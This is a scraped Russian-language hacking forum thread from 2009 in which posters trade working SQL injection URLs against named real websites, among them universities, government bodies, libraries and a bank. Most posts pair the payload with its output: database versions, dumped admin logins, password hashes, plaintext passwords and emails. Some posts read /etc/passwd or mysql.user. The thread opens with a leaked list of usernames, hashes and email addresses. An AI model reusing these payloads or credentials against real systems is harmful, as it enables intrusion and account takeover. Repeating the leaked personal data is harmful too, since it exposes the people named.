laurap:d0cba58d4fd329d0a83b3b6fb13ede81:laura.paol ini@gmail.com
Neil:9da225c0505a6e02238b5f78743d3cc6:neil@phoniq. net
DanaPlato:b5078088fcea5d478a5aa74a3e2cae5e:danapla to@gmail.com
tascencao:f06c3f2140ecd29426b3cd2c90bf5b35:tascenc ao@aol.com
Rob:b1fd6566dcf66eeb1004fbdf2aa6fada:robert.cruick shank@gmail.com
Thomas Sinclair:2332967c39f11fa94ef341de1ff2b491:thomas.s inclair@gmail.com
em:e14a0e7fd3a01386ff060af4b6d1ee4f:emma_rochester @hotmail.com
davekemp:20286c4422d6971577515e82904d7b8a:davekemp @davekemp.ca
Jess Brouse:075526d8cfdd6714d4886d64c2b4048b:org@brousi an.org
smith:87548a2fe3a6ee22f16c648dd915f4bc:greg.smith@ utoronto.ca
Egnaro:6f344587f6da7b781b4512b30fc15a62:uber.egnar o@gmail.com
Leslie1107:fb164c8efe2e7109732411e94c0c7acf:leslie doyle1107@hotmail.com
fdpo:7e1abedc098c4b78a91fe129718f3799:jaisy@mac.co m
melissagoldstein:3ccf661eae9d2cde52dc10c40b24a60c: moldy109@yahoo.com
Jeeproxx:73b8182292fc11bec3b560d90d0d24c9:roxx_aud io@mac.com
Forrest Mims:52f10f160bdeb0c582dfaed7d3009cbb:forrest.mims @ieee.org
Silent Season:e8520807853745e9cc51d6efd259dbb6:info@silen tseason.com
mccloud06:5a2be4553575e618abf2baa18f272d63:mccloud 06@hotmail.com
--------------------------------------------
--------------------------------------------
<<Обои на рабочий стол>>
http://www.favorites.com.ua/desktop_show.php?id=-1061036018+union+select+1,2,3,4,5,6,7,8,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os)--+
db: 5.0.67-community
name_db: favorite_favorites
user: favorite_favorit@localhost
os: redhat-linux-gnu
table: phpbb_users limit+268,1--+ :)
db: favorite_giacint
log: РусланК
pass: 001122
+limit+x,x--+
http://www.akond.net/?issue_id=-137+union+selecT+null,null,null,null,concat(login, 0x3a,password),null,null,null,null,null,null+from+ users--
Админка:
http://www.akond.net/admin.php
DezMond™
15.04.2009, 17:48
http://www.fhdir.com/viewhost.php?id=-71+union+select+1,username,hash,4,5,6,7,8,9,10,11, 12+from+users--
admin::d24f321a44452c53d4552a8b09574f18f4f2aa44
----------------------------------------------------------------------
http://artoboi.com/foto_pr.php?id=-36+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,log in,pass)+from+gallery_admin/*
Везде логин bolt пас f07ad2552c86bfd4d2396c0114f785ea
Юмористический журнал
http://satirikon.biz/chapter.php?type=-35'+union+selecT+1,2,version(),4--+
<<Электронная библиотека "Труды ученых">>
http://ellib.library.isu.ru/showdoc.php?id=-480+union+select+1,user(),3,4,@@version_compile_os ,6,7,version(),database(),0,1,2,3,4--+
db: 4.1.19-community-nt
name_db: ellib
user: admin@localhost
os: Win32
http://ellib.library.isu.ru/admin - бейсик авторизация
load_file('C.boot.ini')
[Boot Loader] Timeout=5 Default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [Operating Systems] multi(0)disk(0)
rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server
" /fastdetect C:\="Microsoft Windows" C:\$WIN_NT$.~BT\BOOTSECT.DAT="Microsoft Windows 2000 Server Setup"
.:[melkiy]:.
15.04.2009, 20:52
офф сайт канала shanttv shanttv.com
спс rambotnick'y за сайтег :D :D
http://shanttv.com/program.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16--
Database Version: 4.0.27-icd1-log
Database name: shant
User name: shant2006@localhost
http://www.dorchesteratheneum.org/page.php?id=-44+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: atheneum_dorchesteratheneum_org
User name: dorchester683565@64.29.146.91
mailbrush
15.04.2009, 21:09
MsSQL injection
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+system_user)--
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+db_name())--
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+@@version)--
user: sa - кто когда-либо проводил мсскл инъекции, знает, что sa в мсскле типа root'a в мускуле.
db_name: C6_INFO
version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64) Feb 10 2007 00:59:02 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Evaluation Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1)
.:[melkiy]:.
15.04.2009, 21:28
http://www.bohol.ph/article.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
Database Version: 5.0.67-community
Database name: jeroen_db
User name: jeroen_usr@localhost
Интересная таблица: user
neverdie
15.04.2009, 22:30
http://www.who-is-who.by/details.php?id=-1+union+select+1, 2--
admin::kolbasa
jokester: круто, 5 скулей 4 бояна, в следующий раз поставлю минус
как всегда через базу эксплойтов e107
user_name
user_password
http://www.norwinter.com/e107_plugins/userjournals_menu/userjournals.php?blog.-11111%20union%20all%20select%201,2,3,user_name,5,6 ,user_password,8,9,0,11,12,13%20from%20e107_user--
http://www.hightechscribe.com/e107_plugins/userjournals_menu/userjournals.php?blog.-11111%20union%20all%20select%201,2,user_name,4,5,6 ,user_password,8,9,0,11,12,13%20from%20e107_user--
http://www.epostweb.net/e107_plugins/userjournals_menu/userjournals.php?blogger.-11111%20union%20all%20select%201,2,user_name,4,5,6 ,user_password,8,9,0,11,12,13%20from%20e107_user--
admin 65375cd0c849d17a2da343bf2ff22183
http://www.wheelhouse.ru/e107_plugins/userjournals_menu/userjournals.php?blog.-11111%20union%20all%20select%201,2,user_name,4,5,6 ,user_password,8,9,0,11,12,13%20from%20e107_user--
DMagister 588d37cb859370997479fa6540675538
.:[melkiy]:.
15.04.2009, 23:00
neverdie, проверяй на антибоян и никто не будет удалять твои скули
--------
http://www.addtime.ru/kom.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32--
Database Version: 5.0.26-lk-log
Database name: lanorg_atop
User name: lanorg_atop@localhost
Юзеры:
cf93cf1b46ee24c27f267fc1e60a2698:Maverikk
b571c59fa56bbece08207790f1cae85:addtime
00e86eabc4c29599d2462acdbc729d73:Oziris
8725dc9b2d5185386438d70f8b17e733:dolphin
e10adc3949ba59abbe56e057f20f883e:evgen
6c0c76eb736f3c5c1ec3bb2e09e860d2:Кравцов Александр
0e6443d556818b2f7fdb668aa2e33a72:avasport
a47783ae549671f8693153ed7647c12d:wrecker
2ceab75675e177591d62857b43ae6121:myxtap@list.ru
d234996d31635c9a384fdecbb147ffb9:sany
0cd55217963e07542839a1ae26b90504:Pirex
88a3e186e2c934ad464dcf516072d696:clubatog
b53a60644f901c10f27c27e8f8937f97:Павел
707e18d82b6eb299b1fb4d16099a3bb5:dual
8226ac2b36ae53f0c0b5e98a34e06169:vlgashnev
f82f36b641af6bbed99c63fc8553d6da:x9vb20
11f9f90e63bf0e28378becf53a5bc39d:deonisii
11f9f90e63bf0e28378becf53a5bc39d:deonisii2
378a063b8fdb1db941e34f4bde584c7d:drive-class
e26d537ebf77530a5473940314f8e8a2:vydr
47e32ba255f93fab0aca37f7d64e5d19:Black
cad3b9d9a79d9bb016ef1dfbb47c8771:parachel
b1716ae20e2839c734d72a662cab978f:paraglidingteam.r u
902957c8629935de4e3bc0fe429954ac:Perevalov
280ef1963ed6754eb2a7a75dc6266da8:GraN
b6ee3fa99572ecc6e1f16c5b18a3ebb6:aigen
accbce2bde56d482a584383f7f0df67c:olgakv
546a3ff1e53496613a28e8c19765bf29:molodoys
67e85061aaab67dca46b3b8a1a443555:emis3
456952f553b82e5ab0afdd8d3babe183:adminass
bd80c96400c0e0d01df3bddc8229e30d:traveller
1adcf06714196599f5bbf5ef6db975ba:timme
68e1748c1784491049dd10b4e1cf9466:Directorsib
7f044f84f9bc68b9079bfe9a473d8d34:divemistral
099b3b060154898840f0ebdfb46ec78f:ex1reme
5fd1884d90afe4313fe06941bd15c3f1:extremeby
bb874d42d8bdbb80c3cec5f803b91567:EasyFlight
f3afa028b52158b6c10832bd8f7ab45d:strannik
72e9755d3e25b1258ff516305b605f3c:shelenkov.ru
fd47ba366bcbe68a318cd7afbae51d86:asobetov
1f8822f86dc862845df289efef03929b:WINneyPH
b67100b928d94685cefe5a6209b5a808:onix
aeeebad69fd8dfbfd59ef1686c6b211e:groza
1989bb0993efe1b5133eb36f6f211f17:Maxiss1000
c1e213c4b3dc4f08a256dfcee9aa3ca3:ant_one
e67c10a4c8fbfc0c400e047bb9a056a1:Do-Do
c579ffa62a505b53c0510aa26b2bd47a:diveshkola
630393c06fc4c7c25d76bd60bbdc9e73:Bad_Toha
2d508aba4f687593b42a353f386282c0:pegasclub
74700c8b661449865a027368ed0ed729:Diversant
c4fb9aa93a055e392af6bc212555ad6f:Magist®
d3d6fc3ebffbce5eb1f28353fa341683:snowclick.ru
f7cfa922de1dc97d26d0e92b5de67dc8:rea
96160e259f210e6d14ab469b98eee34b:ANGEL
25d55ad283aa400af464c76d713c07ad:sinoptic
c0944a31a9aff9f7a98fc516b860e4c2:sky7
caf1ca0989b861a27949a43b12faa9f3:Zomb1e
5168b013483c21c5add2b96ebe2bf7e3:horizont
3847c20204538c884279ddfbee61327c:ziga
4297f44b13955235245b2497399d7a93:skateadmin
27805b77471d1646b8e428e407276902:salabay
264806d66790573dea82348b4e3b7c11:soso
f1f3c779e7d9040f5994dede3f4d4d13:extreme-nk@list.ru
http://www.pei.it/p_press.php?s=press&p=archive&arch=1&sp=TRE+NUOVI+PRODOTTI+EMO+2003&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.26-Max-log
Database name: pei
User name: pei@localhost
Login: admin
Pass: 07fe1b79422506ae5906d590f90a9c52 : ppeiw
http://www.buyersfriend.com.au/view_article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,pword ),5,6,7,8,9,10+from+admin--
DB Version: 4.1.22-standard
DB Name: buyersfr_buyfr
DB User: buyersfr_bobby12@localhost
Admin data: merchant:venice
http://www2.diego10.com.br/pages/news/werder_bremen.php?L=en&id=-1+union+select+1,2,concat_ws(0x3a,user,pass,email) ,4,5,6+from+auth--
DB Version: 5.0.51a-24
DB Name: diego
DB User: diego@localhost
Admin data:
icue:*3E9B21C7319E502A3A639A3B26D4384DF1D319B3
x_x_fabiano:*7CB3910B2B51960AAD603627885284A71C9FD 148
leo:*32240CB0851DF159A009865793086FA663A007D4
http://www.phonostar.de/radiomagazin/podcasts/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
DB Version: 5.0.26-log
DB Name: phonostar_global_db
DB User: pscollector@localhost
http://www.cedarpark.org/ministries/auxillary/index.php?id=-1+union+select+1,concat_ws(0x3a,firstname,email,pa ssword),3,4,5+from+cp_users--
DB Version: 5.0.21-community-nt
DB Name: cpc
DB User: cedarpark@localhost
Admin data: Nathan:nate.h@cedarpark.org:81dc9bdb52d04dc20036db d8313ed055
http://www.zonapunk.com.br/ver_materia.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,usuario_logi n,usuario_senha,usuario_email)+from+usuario+limit+ 0,1--
DB Version: 5.0.67-log
DB Name: zonapunk
DB User: zonapunk@abbazaba.dreamhost.com
Admin data:
ayw:e10adc3949ba59abbe56e057f20f883e:alex@midiaweb .com.br
paregonta:e10adc3949ba59abbe56e057f20f883e:allan@m idiaweb.com.br
wlad:1f40d69f9ba61d4f960d7ae837d62c3c:info@zonapun k.com.br
winstrool
16.04.2009, 10:38
Решил освоить скуль и вот мой первый результат:
_http://kls.ksu.ru/boduen/bodart_1.php?id=9+union+all+select+1,concat_ws(ver sion(),user(),database()),3,4,5,6,7,8--&num=14000000'
DATABASE():biblfil
USER():filfak@localhost
VERSION():4.0.27-log
http://cmserver.org/library/cat/sex.php?id=-74+union+selecT+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,0,1--
db: 4.1.22-log
n_db: db_doctor_4
user: dbu_doctor_2@192.168.5.56
os: slackware-linux-gnu
http://cmserver.org/admin/ -бейсик авторизация
http://www.loc.gov/loc/cfbook/relatedorgs/display_cat2.php?cat_ID=-1+union+select+concat_ws(0x3a,username,email,passw ord,admin)+from+users_2+limit+0,1--
DB Version: 5.0.22-log
DB Name: CFB_web
DB User: CFB_user@140.147.249.7
Admin data: jmangin:baaec204688ead3ce9528dc716ed4d7a
http://www.ips.uiuc.edu/isss/pages/index.php?catID=3&pageID=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5+from+administrator--
DB Version: 5.0.67-log
DB Name: isss
DB User: iepadmin@localhost
Admin data: rwsadmin:3a2ca2e1b235eed006a935cadb90227f
http://www.mills.edu/calendarexpress/month.php?catid=-1+union+select+1,concat_ws(0x3a,user_name,password ,email),3+from+ce_user+limit+1,1--
DB Version: 5.0.22-standard
DB Name: calendarexpress
DB User: admin@localhost
Admin data: admin:44f55fe518eb4f59f63642c738481d61
Студия "Web-техника", основанная в 2003 году, специализируется на разработке Интернет-сайтов
http://webtechnics.ru/page.php?id=-2'+union+select+1,concat(uname,0x3a,passwd),3+from +geodis_users--+
Админка:
http://webtechnics.ru/admin.php
http://www.megara.org/cat.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13
Database Version: 5.0.67-log
Database name: megara
User name: megara@10.15.74.1
http://www.megara.org/cat.php?id=-1+UNION+SELECT+1,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13
http://www.mgutheses.org/cat.php?id=38+UNION+SELECT+11111111+LIMIT+1,1/*
Database Version: 5.0.45
Database name: anwar_mgu
User name: anwar_mgu@localhost
<<Information Architecture Institute>>
http://iainstitute.org/library/subjectPage.php?id=-12+union+select+unhex(hex(concat_ws(0x3a,version() ,database(),user(),@@version_compile_os)))--+
db: 4.1.16-standard-log
n_db: aifia_library
user: aifia_library_ro@pistone.dreamhost.com
os: pc-linux-gnu
Calcutta
16.04.2009, 19:34
http://doitwithflair.ca/index.php?page_id=28+and+substring(version(),1,1)= 4
http://scrd.ca/index.php?page_id=359+and+substring(version(),1,1) =5
<<Niobrara County Library>>
http://www.niobraracountylibrary.org/history/index.php?id=-31'+union+select+unhex(hex(concat_ws(0x3a3a3a,vers ion(),database(),user(),@@version_compile_os))),2, 3,4,5,6,7,8--+
4.1.16-standard-log:::library:::dsturman@dimarco.dreamhost.com:::p c-linux-gnu
------------------------------
------------------------------
sql - blind
<<About the James A. Gibson Library, Brock University>>
http://www.library.brocku.ca/subres/guide.php?id=14+and+ascii(substring(version(),1,1) )=53--+
db: 5 ....
n_db: library
user: library@localhost
http://www.scaune-ergonomice.ro уязвим для SQL-injection.
Вот список пользователей.
http://www.scaune-ergonomice.ro/birou.php
?id=2+and+0+union+select+1,2,concat_ws(0x3a,email, parola),4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28
+from+users+limit+1,1+--+
Есть конфликты с кодировкой, решаются через cast. Например:
http://www.scaune-ergonomice.ro/birou.php
?id=2+and+0+union+select+1,2,cast(version()+as+bin ary),4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28
+from+users+limit+1,1+--+
Версия: 4.1.11
Имя базы: eurofoto_scaune
Имя пользователя: scaun@localhost
Доступа к таблице mysql.user нет.
http://sex-izvrat.com/index.php?cat_url=-16'+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user())/*
5.0.45:sexiz:morrr@localhost
<<Greenroofs.com Projects>>
http://www.greenroofs.com/projects/pview.php?id=-29+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8--+
4.0.27-standard::::db207579874::::dbo207579874@localhost: :::pc-linux-gnu
Еврейская информационная служба
http://www.jewnet.ru/newslines/?profile_id=-14)+union+select+1,2,3,concat(table_name,0x3a,tabl e_rows,0x3a,table_schema),5,6+from+information_sch ema.tables+limit+17,100--+&action=search
Радиевый институт им. В.Г.Хлопина
http://www.khlopin.ru/view_event?id=-15+union+select+1,2,3,4,5,table_name,7,8,9,0+from+ information_schema.tables+limit+17,1--
GOV
https://postdocportal.dep.anl.gov/SPT--TopicMessages.php?topicid=10+union+select+1,2,3,4, version(),6,7/*&forumid=2
Version: 5.0.45
User: apache@localhost
Dbname: PostdocPortalSPT
File_priv=Y
http://www.sabpa.org/web/news_details.php?ID=-1+union+select+1,concat_ws(0x3a,first_name,passwor d,email,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+from+tbl_reg+limit+2,1--
DB Version: 5.0.51a-log
DB Name: sabpaorg_main
DB User: sabpaorg_main@boscgi0104.eigbox.net
PR: 5
Admin data: Yuerong:ronzhu:ron@sabpa.org
http://www.thehockeyacademy.com/index.php?pageid=666+union+select+concat_ws(0x3a,u ser,password,file_priv),2,3,4,5+from+mysql.user--
DB Version: 5.0.32-Debian_7etch5-log
DB Name: thalive
DB User: root@localhost
MySQL Admin data: root:*93557E6B71D093D803CBAC890F5A2A0877DA8729
PR: 4
http://www.stt.fi/bw/article.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8--
DB Version: 4.1.12
DB Name: wirereleases
DB User: mile@194.100.184.209
PR: 6
http://www.furtherfield.org/displayreview.php?review_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password,email,admin),10,11,12+from+Users+lim it+3,1--
DB Version: 5.0.27-log
DB Name: test
DB User: atty@localhost
Admin data: ruth catlow:382a9bb65e35773a:ruth.catlow@furtherfield.o rg
PR: 5
http://www.mg-rover.org/xpower/showart.php?ArtID=-1+union+select+1,2,concat_ws(0x3a,UserName,UserPas sword,UserEmail),4,5,6,7,8+from+mgrusers+limit+0,1--
DB Version: 5.0.67-community
DB Name: massn2_mnpo
DB User: massn2_Brook3@localhost
Admin data:
Steve Childs:almond:steve@mg-rover.org
Dr Dave:jgfftsvd:drdave@mg-rover.org
PR: 4
<< Casual Life - жизнь в стиле casual >>
http://www.casualife.ru/index.php?act=article&id=-415+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,0, 1,2--+
4.1.22-log:::casuali4_debug:::casuali4_casuali@localhost: ::portbld-freebsd6.1
table: users
column:?
----------------------------------
----------------------------------
<<Фан клуб группа "Звери">>
http://www.33hochu.ru/fanclub_gallery_view.php?id_club=3987+union+select +1,column_name,3,4+from+information_schema.columns +where+table_name=char(117,115,101,114,115)/*
5.0.32-Debian_7etch8-log:::33h:::33h@localhost::::pc-linux-gnu
table: users
db: passtest
kiss34:c8b2f17833a4c73bb20f88876219ddcd
------------------------------------
------------------------------------
<<Николаевский Бозаръ>>
http://old.bazar.nikolaev.ua/print.php?id=-356+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),8,9,0, 1,2,3,4,5--+
4.1.22-log:::bazar_old:::bazar_old@apollo:::portbld-freebsd6.2
Уязвимы скрипты:
bigimg.cgi
Сайт фирмы разработчака cms(pr3):
http://www.webylon.ru/bigimg.cgi?id=-65+union+select+version(),2,3--
Комп сервис(pr4):
http://www.pcs.ru/bigimg.cgi?id=-1+union+select+version(),2,2--
Государственный комитет РК по энергетике и регулированию тарифов(pr4)
http://rekrk.ru/bigimg.cgi?id=-1+union+select+version(),2,2--
Министерство здравоохранения респ карелия:
http://mzsocial-rk.ru/bigimg.cgi?id=-1+union+select+version(),2,2--
и так далее, ок десятка сайтов...
place.cgi
http://nordfoto.ru/cgi/place.cgi?id=999+union+select+1,2,version()--
bigimg_galery.cgi(вывод смотреть в исходнике страницы)
Ассоциация защиты информации(pr4):
http://www.azi.ru/bigimg_galery.cgi?id=9999+union+select+version(),2 ,3,9--
и т.д. около 60 сайтов.
Вот такие шаблонные сайты предлогает фирма Mediaweb купить от 3к рублей =(
зы: интересная табличка SITE_ADMINS, и админка сама должна быть интересная ; ) с возможностью правки скриптов, как сообщяет саппорт, но ее я не нашел(сообщите плз есль кто найдет)
The end.
DezMond™
17.04.2009, 20:04
http://liveoaks.lsu.edu/info/details.php?zone=fr&id=-24'+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12+from+mysql.user/*
root::5edf35344cf0a863
http://www.euroexpress.org/recent_developments.php?section_id=-2'+union+select+1,2,3,concat_ws(0x3a3a,user_login, user_passwd),5,6,7,8,9,10,11,12,13+from+users/*
cmradmin::ÿ"›-ï}cc
<<Управленчиский портал "Managerial.ru">>
http://managerial.ru/news.php?id=102+union+select+1,2,concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os),4, 5,6--+
4.0.27-max-log:::julia417:::julia417@v43.valuehost.ru:::unkno wn-freebsd4.7
-=admin=-
login: admin
pass: 9827Q59h
-=users=-
Привалова Юлия Витальевна:3uKcZJS
Simplesitetester igor k:BqFdd6z
Simple vacancy maker:QywV9rc
Диденко Юлия Викторовна:KNDMP0R?
Шелегов Константин Анатольевич:caxE6rP
Усова Юлия Владимировна:9YhBCJs
Никонорова Елена Михайловна:sq4dssF
------------------------------------------
------------------------------------------http://www.detfond.org/news.php?id=-2008080803'+union+select+1,2,3,concat(version(),0x 3a3a,database(),0x3a3a,user(),0x33aa,@@version_com pile_os),5,6,7,8,9--+
5.0.27::detfond::detfond@localhost3?redhat-linux-gnu
http://www.detfond.org/admin/
information_schema - It is closed
mailbrush
17.04.2009, 21:22
ПР4
http://www.thaihomemaster.com/webboard-readtopic.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11
thaihomema_root@localhost:thaihomema_home:5.0.41-community-log
PR3
http://www.carolverret.net/viral/readtopic.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8
carol@localhost:carol:5.0.77
Давненько меня тут небыло.
http://www.saurusreptiles.com/readtopic.php?category=Crested%20Gecko&tablename=crestedgecko_2&oldtablename=crestedgecko&code=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5
saurusreptiles@68.178.254.234:saurusreptiles:4.1.2 2-max-log
http://www.nicodepaola.it/topicRead.php?topic=5&id_topic=1+union+select+1,2,3,concat_ws(0x3a,user( ),database(),version()),5,6
user@plesk-unix4.tol.it:NDP_DB:5.0.68
fox_malder
17.04.2009, 21:50
вот скулины - http://www.paragon.ge/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A2 0,%20id,name,pass),11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31+from+na_users/*
http://www.paragon.ge/index.php?id=-1+and+0+union+select+1,2,3,4,5,6,7,8,9,table_name, 11,12,13,14,15,16,17,null,19,20,21,22,23,24,25,26, 27,28,29,30,31+from+information_schema.tables+limi t+26,1/*
http://www.paragon.ge/index.php?id=-1+and+0+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0 x20,pass,name),11,12,13,14,15,16,17,null,19,20,21, 22,23,24,25,26,27,28,29,30,31+from+na_users/*
Логин:пароль админа. Как его использовать ещё не нашёл
http://www.diversity.ge/rus/news.php?id=130+and+0+union+select+1,2,3,4,5,conca t_ws(0x3a,name,passwd),7,8+from+user+limit+0,1+--+
Доступна information_schema, mysql.user заблокирована.
<<Chris Hewlett - PR and Artist Management>> :)
http://www.chrishewlett.com/archive/detail.php?id=-55+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,0--+
4.1.19-standard-log:chrishewlett:chrishewlett@localhost:unknown-freebsd6.0
http://www.chrishewlett.com/admin/
.:[melkiy]:.
18.04.2009, 00:27
Строительный портал
http://baza.in.ua/topsite/kom.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32--
Database Version: 4.1.22-log
Database name: baza1_topsite
User name: baza1_topsite@v48632.freefost.com.ua
Выводить из users
geomap.ru
карты городов
pr4 тиц100
http://geomap.ru/payment?pid=3&cid=25+and+1=0+union+select+concat_ws(0x20,user(), database(),version(),@@basedir,@@datadir,@@tmpdir, @@version_compile_os),2+--+--
geomap_map@localhost geomap_map 5.0.26-lk-log /usr/ /var/lib/mysql/ /tmp pc-linux-gnu
http://www.hickman.ne.gov/index.php?pid=164+union+select+1,2,concat_ws(0x3a, username,pass,email),4,5,6,7,8,9+from+Users+limit+ 0,1--
DB Version: 5.0.75-community-log
DB Name: hickmann_hickman
DB User:hickmann_hweb@localhost
Admin data: hickmanadmin:8dbdda48fb8748d6746f1965824e966a:dann is@diodecom.net
http://www.mpm.edu/collections/staff/staff.php?s=-1+union+select+1,2,3,4,concat_ws(0x3a,fname,pword, umail,memlev),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20+from+mpmadmin.tbladmin+limit+0,1--
DB Version: 5.0.67-community-nt
DB Name: mpmstaff
DB User:mpmadmin@localhost
Admin data: Development:nogo:membership@mpm.edu
ILYAtirtir
18.04.2009, 02:06
Закрытое Акционерное Общество Булгар Банк.
http://www.bulgarbank.ru/download.php?file_id=218+and+ascii(substring((sele ct+version()),1,1))=52
Слепая скуля. Если выполняется то начинается закачивание .zip если нет то download.php ))) => 4ая ветка.
Можно проверить существует ли таблица
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+qwe rty
Table 'bulgarbank.qwerty' doesn't exist
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+mys ql.user
Access denied for user 'bulgarbank'@'localhost' to database 'mysql'
Стоит админка CubiQue.Где у неё юзеры в базе или в конфиге хз,писал на мыло саппорту насчет админки они так и не ответили,ну и пох))))
Официальный сайт. Студенческий профком УлГУ
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,convert(user()+using+binary ),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,convert(database()+using+bi nary),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,convert(version()+using+bin ary),3,4,5,6,7
students@localhost:students:4.1.14
DrAssault
18.04.2009, 06:12
http://www.hayonstudio.com/project.php?id=4+and+substr(version(),1,1)=5/*
http://www.shoplifted.co.uk/index.cfm?act=shop&process=full&id=453+and+substr(version(),1,1)=5/*
AkyHa_MaTaTa
18.04.2009, 08:59
www.groundworkopensource.com Pr-6
http://www.groundworkopensource.com/products/poll-results.html?poll_id=6+union+select+1,concat_ws(0x 3a,user(),user,password,host,file_priv),3+from+mys ql.user--+&novote=1
mailbrush
18.04.2009, 10:48
http://www.alsystems.com/newsletter.php?id=-11+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9
alsystem_alsyste@localhost:alsystem_alsys:5.0.67-community
Assembler
18.04.2009, 10:58
http://www.press-conferences.ru/next.php?pid=1%20union%20select%20version()--
4.0.21 -
Давно меня небыло. Сорри инета нету!
<<Япония В России>>
http://japonia.ru/info/new_window.php?id=-313+union+select+1,2,3,4,concat_ws(0x2a3a2a,versio n(),database(),user(),@@version_compile_os),6,7,8, 9--+
4.1.25*:*japonia_content*:*japonia_content@localho st*:*portbld-freebsd6.3
http://japonia.ru/admin/
-----------------------------------------
----------------------------------------
MSSQL
<<Yonsei Medical Journal>>
http://www.eymj.org/abstracts/subList.asp?year=1998'+or+1=@@version--
VERSION:[Microsoft][ODBC SQL Server Driver][SQL Server]nvarchar 값 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.swmgamers.com/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,user_pas sword,8,9,0,11,12,13%20from%20e107_user--
Version : 4.1.22-max-log
OS : unknown-linux-gnu
3302:9db50106284fbd34f22d89a835f6e024 - rtx35b29
-------------------------------------------------+
http://opengamestudio.org/Main/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,user_pas sword,8,9,0,11,12,13%20from%20e107_user--
Version : 4.1.22-standard-log
OS : unknown-linux-gnu
0x21h:7536c300f434b5db60b39ce300ca1c7d
http://www.kadis.ru/
Правовой дайджест СМИ Санкт-Петербурга
http://www.kadis.ru/daily/dayjust.phtml?id=-8233+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from +information_schema.tables+limit+1,1--
Уже постилось два года назад ©Grey'eм, но на данный момент не работает. Так скажем обновил. :p
<<KANBAN.Ru. Крупнейший каталог блогов, новостных лент и RSS>>
http://www.kanban.ru/catalog.asp?cat_id=315+or+1=(select+top+1+column_n ame+from+information_schema.columns+where+table_na me='tbl_users'+and+column_name+not+in+('id','kb_lo gin','kb_password'))--&pg=7&search=&rss=37062
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db: kanban
user: kanban
table: tbl_users
-=admin=-
id: 2
log: kanban
pas: 345345
-=users=-
+where+id=x)--
http://www.everydaydish.tv/index.php?page=recipe&recipe=-1+union+select+concat_ws(0x3a,user,password,file_p riv),2,3,4,5,6+from+mysql.user--
DB Version: 5.0.32-Debian_7etch8-log
DB Name: everydaydish
DB User:root@localhost
